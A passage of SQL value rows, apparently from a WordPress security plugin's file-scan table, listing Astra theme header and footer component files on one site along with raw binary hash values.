('¦Ñà7)ííÏlü8', 'wp-content/themes/astra/inc/builder/type/footer/menu/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/menu/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÚíR9ENöC0Žf¡DL%', 'ì½À‡"üÔ~®E}¬s\r¯ÞqZÁ9>ƒòšÞf¯', '', 0, '?'),
('u%ÆlZ$âíKƒÖî¬¸l', 'wp-content/themes/astra/inc/builder/type/footer/primary-footer/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/primary-footer/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ý‘©Æ7ìcÏMQt]%—ê', '±'':Ä;OOÖ¨úôÁ®7/‘5¶ŸZ®³¬Ñ/¹', '', 0, '?'),
('Ó,TÿK£áÌ\n†4ŽÍÙì', 'wp-content/themes/astra/inc/builder/type/footer/primary-footer/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/primary-footer/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ãÊBnì€øyß ÿw{€Ð', '\09RñÛËˆâöÖé¬¸ÛÇ°gâT¥ ÍƒáX¦Á', '', 0, '?'),
('æsÿ­EœoJ;„/ù', 'wp-content/themes/astra/inc/builder/type/footer/primary-footer/class-astra-primary-footer-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/primary-footer/class-astra-primary-footer-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¹-\rd–iqfëëÆ¼¾k', 'Žm>P\r`w¼žÔ ˜¬Äž,ÚBˆg¾õê…üò§–;', '', 0, '?'),
('ðôP)SaËÖÂî€Ï®Œ', 'wp-content/themes/astra/inc/builder/type/footer/primary-footer/class-astra-primary-footer.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/primary-footer/class-astra-primary-footer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '~?‚,ÎQÒ‡qJó™´', 'ä$ÏPM™²õ1—kô]¯‘å¢Ð,ÈUäÔí\0•áþºê', '', 0, '?'),
('h|g#°ÌB&£‡p9«h', 'wp-content/themes/astra/inc/builder/type/footer/primary-footer/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/primary-footer/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'š	ÓŠþ	y˜.w`{‹', '+#lN¿>\0\0Æ¨,]ñçm}]ÅÚ/Æ	xsiWt#Þ', '', 0, '?'),
('Lp¢q>§K†1¥óÓv', 'wp-content/themes/astra/inc/builder/type/footer/social-icon/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/social-icon/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'éI]•âŸ•Éˆlr’W', '¢2@yÐ{1Š?‘Gñ&þ­yJr»Š:.Û¹«', '', 0, '?'),
('›ûÅb¥uPq2çhÉ{1', 'wp-content/themes/astra/inc/builder/type/footer/social-icon/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/social-icon/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\0¢])sPµ.‘Ö›àÓb ', '(øù’ÍÇ¦Ð„›ÒÆ%mÿ…Tã`Q	8¸:hÓöR', '', 0, '?'),
('B;_V×……òNNàµ Ò»3', 'wp-content/themes/astra/inc/builder/type/footer/social-icon/class-astra-footer-social-icons-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/social-icon/class-astra-footer-social-icons-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'D\0cÿÍÜ´Ô•[:HÁ', 'ß\\Çÿ·J`gû}<Ž÷Ò3–¡l0ÿLp°Ö]ˆÊ~T', '', 0, '?'),
('é°‰ü-‰<X&—KPcø', 'wp-content/themes/astra/inc/builder/type/footer/social-icon/class-astra-footer-social-icons-component.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/social-icon/class-astra-footer-social-icons-component.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '-è~9Aï³SÒ¨qì…ŒÆ', 'AýÅn©¬yºbtÄC¯h#“IØìb¿Xí—Žg@', '', 0, '?'),
('×†âmºP"aq\\Îw¾', 'wp-content/themes/astra/inc/builder/type/footer/social-icon/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/social-icon/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¬Ù[pô	ó)ÝGU:U‰‘', 'gr`C¶ÖnŒŠ_Rþ0=¼€M0C§^Öªo¤', '', 0, '?'),
(')R©ëYš2Ó>\Z!f[Î', 'wp-content/themes/astra/inc/builder/type/footer/widget/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/widget/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'KÈ@Å‰¢%/m	À™', 'i2fÌ‰=XÂ8ÌÌ|6n¶•û m›ð¦¹¥ n³b', '', 0, '?'),
('±ü…”6¯~p¼‚¯uHø2', 'wp-content/themes/astra/inc/builder/type/footer/widget/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/widget/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Bøó}šdî?ÍOÚ:q#', 'Ä­è¼\0ÿä(ÑªßÍ¬±ãhU>”ì¤š\rÄw\n\ZØÕp', '', 0, '?'),
('_¿ðêtfDÃüÒßk¥Àz', 'wp-content/themes/astra/inc/builder/type/footer/widget/class-astra-footer-widget-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/widget/class-astra-footer-widget-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'lft®­jûM7¯†\Z?.\r', 'd#ßvÕÚ_Ùo’º	ØrÕÑÚGs2{™éE)’4´<w', '', 0, '?'),
('S¶)Ú\0À†²×Ç1Pð', 'wp-content/themes/astra/inc/builder/type/footer/widget/class-astra-footer-widget-component.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/widget/class-astra-footer-widget-component.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '™Êq‘PÿC;·âðÊVÒ', 'ˆÑÓªe‡‚H‘×†ÌÐ48xsî¢çñÜØá*±', '', 0, '?'),
('1î‰?ôààÇí<¤:°', 'wp-content/themes/astra/inc/builder/type/footer/widget/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/widget/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'qüÊåå›¸L#''ÊÜ', 'ìƒ§TK20œði¤PM9É¸0þâ˜€NÖ˜å.^ØÞÙª', '', 0, '?'),
('ìoæâXÖ¾ÿ|Wátgo', 'wp-content/themes/astra/inc/builder/type/header/above-header/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/above-header/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¸s5;.Šöï\0¢NÓxV=`', 'Éøya[i	è4#³ºn''d‡¡º&Â8­´;8', '', 0, '?'),
('­+&¿…áêjkš"Gv_W«', 'wp-content/themes/astra/inc/builder/type/header/above-header/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/above-header/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ŠOÑÄ\ZjI‹al¢êF[Š', 'eò~±èWàÕ\n"ïÛ=’y;É§ÑE›cC#', '', 0, '?'),
('Ä,(“½•éO¡#]û4Ä', 'wp-content/themes/astra/inc/builder/type/header/above-header/class-astra-above-header-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/above-header/class-astra-above-header-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '`?Ê³]‚¡¥Íä‚ Peó7', '"c€°nÈoŸ}f€ô›éë¾\nÖ§ù ë|ÏËUŒD5þ', '', 0, '?'),
('îÉõg„êvBn‹§•''·', 'wp-content/themes/astra/inc/builder/type/header/above-header/class-astra-above-header.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/above-header/class-astra-above-header.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'u^Ôß=¥p¡`³Ã<X', '''ç57àt8´ÿ,öx¬ù?älÈ$báÈðÂ~FÕ³DÃ', '', 0, '?'),
('¸ÉÑÙNêÐÑ®>MÏ', 'wp-content/themes/astra/inc/builder/type/header/above-header/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/above-header/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'É}=[EK{A]×ÖyäÃ$µ', '‘}cúŠÒL|''a¨uC-1†ñm£–8AåµAÞ]', '', 0, '?'),
('X(Óz]ÂòŸ²ü2ÿQbf', 'wp-content/themes/astra/inc/builder/type/header/account/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/account/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '?Úx/êŒøÕ¬-®·áS', '™ð^\\Ñ\r#uµ}ì÷9_ªo¿Üý5‡%»ÙÓÇÏ', '', 0, '?'),
('8ãðpn{3qÍéX­°M', 'wp-content/themes/astra/inc/builder/type/header/account/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/account/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '.3•=òÏÙ•íwüËþ†+', 'Í¿kvŒßçî^ê;ž‹øHñ÷AÊÊ|Dk‰=~', '', 0, '?'),
('õ/^³T‡Šý˜±¤H4©¹', 'wp-content/themes/astra/inc/builder/type/header/account/class-astra-header-account-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/account/class-astra-header-account-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ê¤J÷S)«Þ²JìA®%', 'ÑÒ€ôÉÃ‰Šú£@ÒL– ãuÖŒPÛÂÎ‡Ëà', '', 0, '?'),
('ÙIÅi²0ŒÃao*Ý)¿', 'wp-content/themes/astra/inc/builder/type/header/account/class-astra-header-account-component.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/account/class-astra-header-account-component.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¬ó8 Á€qõ.Ås¦pPè', 'M¬ª(N3J¸±[?WdZ\ZsVqNV\ZäöøíR<á`', '', 0, '?'),
('{8#ïŸ:ÂÞBíõŒÛé', 'wp-content/themes/astra/inc/builder/type/header/account/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/account/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ðýåá¯&ë‰ý¸Ï*', 'êç''T¡1òï_\ZTDŒiZO´F¡¸¢†›±V', '', 0, '?'),
('Ie,Wqí”ù™Y‰PYŒh\0', 'wp-content/themes/astra/inc/builder/type/header/below-header/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/below-header/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¦=Ú©~\rŽ8˜¢)Ùþé ', 'p©$Án7ó‰''2ï¯A"ù¾?ë{7ÄmC•—3l¥', '', 0, '?'),
('SÎrù=|4}`Gú\\‘|V', 'wp-content/themes/astra/inc/builder/type/header/below-header/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/below-header/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ƒÅª¥ž]wKÙ’‡1', '\n’Ä,×Põ˜"·9þúÎ’!ùSÆ™îùÏ¡²ñÇ>tù', '', 0, '?'),
('ì.‘s¦¾hÀèû¯Ì’', 'wp-content/themes/astra/inc/builder/type/header/below-header/class-astra-below-header-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/below-header/class-astra-below-header-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‚\0¶4•Ÿý&š4Æ?$Bƒx', '·2M\\Ft)\0ˆ_Ð¨M†$5†´¼³xvÁG7\0¢<î', '', 0, '?'),
('¥¯d7F›S²Ío*…kkº', 'wp-content/themes/astra/inc/builder/type/header/below-header/class-astra-below-header.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/below-header/class-astra-below-header.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '?hŒ˜¤E¼Ø`~^*6', '	X‰hx|\nŸlg]ØÛ\rÉ*M&Qiï ¡<é?', '', 0, '?'),
('å\n¦žTð«X„’f²î', 'wp-content/themes/astra/inc/builder/type/header/below-header/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/below-header/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '›0«h‹Ò''ÐÈZ™·þ', 'ÓÈýÇ³Âáï;Î]MlîÜBÅ´òd-ç1', '', 0, '?'),
('wQ‘§2M{ÉWiß>5üå', 'wp-content/themes/astra/inc/builder/type/header/button/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/button/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '!¶<þ›ûïðÄ«.3\\ø', 'í<…bí(œ2¸*ffOD&SuÔ!Fwüg3&[', '', 0, '?'),
('+HÖ½okŒ¬oœ¢2', 'wp-content/themes/astra/inc/builder/type/header/button/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/button/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '»"ß@ŽùÂ)¡ô"µ', 'zè«hk~œ¾W4K©<½ïLÝ‡asbová', '', 0, '?'),
('ò~Mà‹-Ú_þ!2º', 'wp-content/themes/astra/inc/builder/type/header/button/class-astra-header-button-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/button/class-astra-header-button-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'èåàm£¡ÇfBˆ\0ÙJMø', 'sŠíÐý\\!š¸÷+NŠµ"}=ÿ«‘	Ç•‹V£åð…ât', '', 0, '?'),
('”Ëï5ŠÊ&‰¯ˆgµÆî', 'wp-content/themes/astra/inc/builder/type/header/button/class-astra-header-button-component.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/button/class-astra-header-button-component.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'â[îÊ+;…ü%¨ÌÌ¥', 'ùøXmIxAçNYÂážUcÜLrUg¨µ4URHÒÀ7', '', 0, '?'),
('©e§Ã…nô‰lÉC¼¨', 'wp-content/themes/astra/inc/builder/type/header/button/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/button/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '½ûŒœwÇZM1#fQÊ\rž', '|o\Zc6œ÷Ï–öåÊûÜmËC±ÃýœÕ0«-õ‡', '', 0, '?'),
('eASqI¶{h&‡#(ŸÝ$', 'wp-content/themes/astra/inc/builder/type/header/edd-cart/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/edd-cart/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‰29ÂÕò³âŽ‡?ñ', 'ß·_ªÔËå¶”¾ŒœF–OÔaŽvò¯Ë’ÍäônS', '', 0, '?'),
('Åmv\n”_õ¾Ç]Ž›xà¢', 'wp-content/themes/astra/inc/builder/type/header/edd-cart/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/edd-cart/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ˆøÞCÂîb{»z©{\rw', 'ßÃi]åäEvƒ_n¼Ü''£‘ÜïÆÕöØÞ/ŠÄÓÔ:Ç', '', 0, '?'),
('šŠ‚­]5I%ÿÙîù•Z', 'wp-content/themes/astra/inc/builder/type/header/edd-cart/class-astra-header-edd-cart-component.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/edd-cart/class-astra-header-edd-cart-component.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÃÛÙh­’ïÎª ±', '‰ã	J.;w¸65''Ô¹RlE2F¨Ë”Âý7@Ê<co©uÝ', '', 0, '?'),
('e„+¨fÛ›.õ\r!\nf„<', 'wp-content/themes/astra/inc/builder/type/header/edd-cart/class-astra-header-edd-cart-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/edd-cart/class-astra-header-edd-cart-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '>iÈ\rní#v\ní.‰5mœ', '-(I½R¹ ƒÀ´É%Ó›Ìß8Ií6«\nò%]\00v', '', 0, '?'),
('é¤€ÌÚ@Õdüîä_\Zn', 'wp-content/themes/astra/inc/builder/type/header/edd-cart/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/edd-cart/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¦žßhèôÖSW]Ÿôïv', 'ûVû¡žŽÑ˜”þ.zoZŸDc¤Ã%‘z§ŒPqã/ì', '', 0, '?'),
('Ì‰.£\0ãhEqÞ÷ÜÞ	ã', 'wp-content/themes/astra/inc/builder/type/header/html/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/html/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ŠeÃo3ËúsqšÝÙhºg', '€;æO\r³o¦Ìr­‡Æé€k(Äð©V“AùÂ', '', 0, '?'),
('¨äØS©þÚÄš(u\0ýü,', 'wp-content/themes/astra/inc/builder/type/header/html/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/html/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'øSƒ™!‡ò@ŸÖ;17´', '=Y*(æYqw•pv^×oeŸIL¸W\ZdòK^ÕÓó', '', 0, '?'),
('=‰iE{èEˆ\\¤93¯', 'wp-content/themes/astra/inc/builder/type/header/html/class-astra-header-html-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/html/class-astra-header-html-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'd[õžÎ.R’>—9V·', '~mßÀr)Óê™f¾c‘Ùò*µ—’ÁäÝ"P\r&#…Ñ', '', 0, '?'),
('É ®qñÐf÷A™_''ÚŸY', 'wp-content/themes/astra/inc/builder/type/header/html/class-astra-header-html-component.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/html/class-astra-header-html-component.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ŒDÞ{*²¾ä„[\\¹', '©¸T´b3þ¸	~b¡Ø	úþe¤©cL*R@S©7Zójó', '', 0, '?'),
('ëf}ÂÅƒÉìõD"ëUr', 'wp-content/themes/astra/inc/builder/type/header/html/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/html/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '—ž‘Çkr''úfwvÖlc', '{îz\nÄLp\ndýk><U^ f6R[k©A(—VgAýR', '', 0, '?'),
('ÿ”Ãj½-2wì[\n® !', 'wp-content/themes/astra/inc/builder/type/header/menu/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/menu/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ï)º‚	h	å3Û›M', '¤DÌž¸¬ëœ¥ÙÝÔpÝñ	wêcÄÇ€¸Ûyi\Z!-', '', 0, '?'),
('*£‚„\r~£È\0Oqˆ*ÒÍ', 'wp-content/themes/astra/inc/builder/type/header/menu/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/menu/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÅíÖL‘ùÉ‹Þ£	Çc¾', 'ÕA‰Y7k)“Š.b—Êõ‰ Ÿ¬,4õËDö%ÚOyÔN', '', 0, '?'),
('Ñ£°Ü%o•ÍPè¿žäýy~', 'wp-content/themes/astra/inc/builder/type/header/menu/class-astra-header-menu-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/menu/class-astra-header-menu-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ãN9 ±äìî\\Üv§Ÿ¥', '®µXF­f[¶†~»f7Pé>½Ã1¸áÑ\rüIDž', '', 0, '?'),
('3ÄÎsyÜ–M\r“iN.', 'wp-content/themes/astra/inc/builder/type/header/menu/class-astra-header-menu-component.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/menu/class-astra-header-menu-component.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'õmª¸ËeoÜ<1Ì í5F', 'æŽ:ðyJÙ)„R\n`ÊUKã\0„¸sCù½ô‰Á:7', '', 0, '?'),
('¶Áôž_b”ªIZÔËÈ@wÄ', 'wp-content/themes/astra/inc/builder/type/header/menu/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/menu/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '`t`0äãÃAÏ4ƒ[', 'Èš,+Ö\nŒóå.Æë­9Òÿç°@%Æ¤‡²‹â', '', 0, '?'),
('>bW˜>¥Í•U)LàCd‡ò', 'wp-content/themes/astra/inc/builder/type/header/mobile-menu/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-menu/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'KÊ+Õ°ÃD¾c<ÞV', '¼þ}Æ$\0gôÑW%Wm—%[Ct¯fßÇ48CoÓÁ	x', '', 0, '?'),
('Sn§yâpÜëGõ„pI', 'wp-content/themes/astra/inc/builder/type/header/mobile-menu/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-menu/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'h–†ÎN‚˜Í¬æ;\0}8þ­', 'öÝôf35ÚÉXç¿/šì1îŸ;ý3YÃº $Ü“Ácš¾', '', 0, '?'),
('–!Mˆ2Dè¦Äd?iª3', 'wp-content/themes/astra/inc/builder/type/header/mobile-menu/class-astra-mobile-menu-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-menu/class-astra-mobile-menu-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ß„¥±¸ïàQËA/A÷±Õ', '>çöÿ#d!Ó‡Y2ˆ*ÒÉSÕ¡Ò~9^u^Þe', '', 0, '?'),
('t%Ûº\Z½. G;÷oNá', 'wp-content/themes/astra/inc/builder/type/header/mobile-menu/class-astra-mobile-menu-component.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-menu/class-astra-mobile-menu-component.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'œóŠ<ÈúcÏ”Wö–¶\rë', 'ú£–ä÷ÝdÍáR{^?Ìì=Þu¼n  NÊÙâÝµ\r', '', 0, '?'),
('å]Ò«Â#â%‡ÄyˆÚ,', 'wp-content/themes/astra/inc/builder/type/header/mobile-menu/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-menu/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'm''npi“sI‚>³', 'YÇNüwUÈ6Q{ÑCŽ\nóKc´ÔÁã°Üj9®ón}H', '', 0, '?'),
('±x™Tí[Q*“5õÔkˆ“', 'wp-content/themes/astra/inc/builder/type/header/mobile-trigger/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-trigger/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÀOËÔÀOF@Ð`Ä3É!', 'Ó\\©¥Msè I!ñª4ÖaÔ}yk0äÈªpË?7óe', '', 0, '?'),
('Ø{–ÃJþ]½ƒELˆ},', 'wp-content/themes/astra/inc/builder/type/header/mobile-trigger/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-trigger/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '_¸*ä	vR³—Mé[‰', 'º\n·%pÂžqe|éÀJ-]Û|eD«=ÐË0y»¶ª$', '', 0, '?'),
('_îE8.mëlfd™¥#', 'wp-content/themes/astra/inc/builder/type/header/mobile-trigger/class-astra-mobile-trigger-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-trigger/class-astra-mobile-trigger-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '·#dr\\ ó¦R…·= \\É', 'ÀYTzq\ZÓÊr#Ô¾ZàûQµr`¢ õ˜M–U:¦f', '', 0, '?'),
('5C9+bsß ^[', 'wp-content/themes/astra/inc/builder/type/header/mobile-trigger/class-astra-mobile-trigger.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-trigger/class-astra-mobile-trigger.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'U8®ŒôÖ*FÕ¶· R	é', '+†éãðŠÝáìªR4ù<ü¿\néÕAÌ«ÏªXxÞ‡', '', 0, '?'),
('áÎÊ¨å œ:Worbè¶', 'wp-content/themes/astra/inc/builder/type/header/mobile-trigger/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-trigger/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ûÁ9Êh ²`Ñ•qËÑ·L', 'Ãõ$a-užÌk´S…«ÞEáÓö|Â10ª£\n»“Ö-', '', 0, '?'),
('´óH•ð¡Í/›‘´GÇ', 'wp-content/themes/astra/inc/builder/type/header/off-canvas/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/off-canvas/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‹mª:À¶ª4QOcPÍÝ!', 'Å{§ð4Ú\Zsdn»¢ ÷jÜ²æ@‘n6üTÑ¬', '', 0, '?'),
